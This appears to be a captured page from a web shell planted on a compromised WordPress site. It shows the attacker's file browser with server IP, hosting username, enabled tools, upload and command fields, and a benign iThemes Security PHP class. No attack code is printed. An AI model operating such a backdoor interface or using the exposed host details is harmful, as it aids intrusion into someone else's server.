403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.146.221.231
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/webauthn/DTO/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/webauthn/DTO/PublicKeyCredentialParameters.php
<?php

namespace iThemesSecurity\WebAuthn\DTO;

use iThemesSecurity\Strauss\Assert\Assert;
use iThemesSecurity\Strauss\Cose\Algorithms;

final class PublicKeyCredentialParameters implements \JsonSerializable {

	/**
	 * This member specifies the type of credential to be created.
	 *
	 * The value SHOULD be a member of {@see PublicKeyCredentialType}.
	 *
	 * @var string
	 */
	protected $type;

	/**
	 * This member specifies the cryptographic signature algorithm with which
	 * the newly generated credential will be used, and thus also the type of
	 * asymmetric key pair to be generated, e.g., RSA or Elliptic Curve.
	 *
	 * The {@see Algorithms} contains a list of available values.
	 *
	 * @var integer
	 */
	protected $alg;

	public function __construct( string $type, int $alg ) {
		Assert::that( $type )
		      ->choice( PublicKeyCredentialType::ALL, 'type "%s" is not an element of the valid values: %s' );
		Assert::that( Algorithms::getHashAlgorithmFor( $alg ) )->notEmpty( 'alg "%s" is not a valid algorithm.' );

		$this->type = $type;
		$this->alg  = $alg;
	}

	public static function hydrate( array $data ): self {
		Assert::that( $data, 'PublicKeyCredentialParameters hydration does not contain "%s".' )
		      ->keyExists( 'type' )
		      ->keyExists( 'alg' );

		return new self( $data['type'], $data['alg'] );
	}

	public function get_type(): string {
		return $this->type;
	}

	public function get_alg(): int {
		return $this->alg;
	}

	public function jsonSerialize(): array {
		return get_object_vars( $this );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit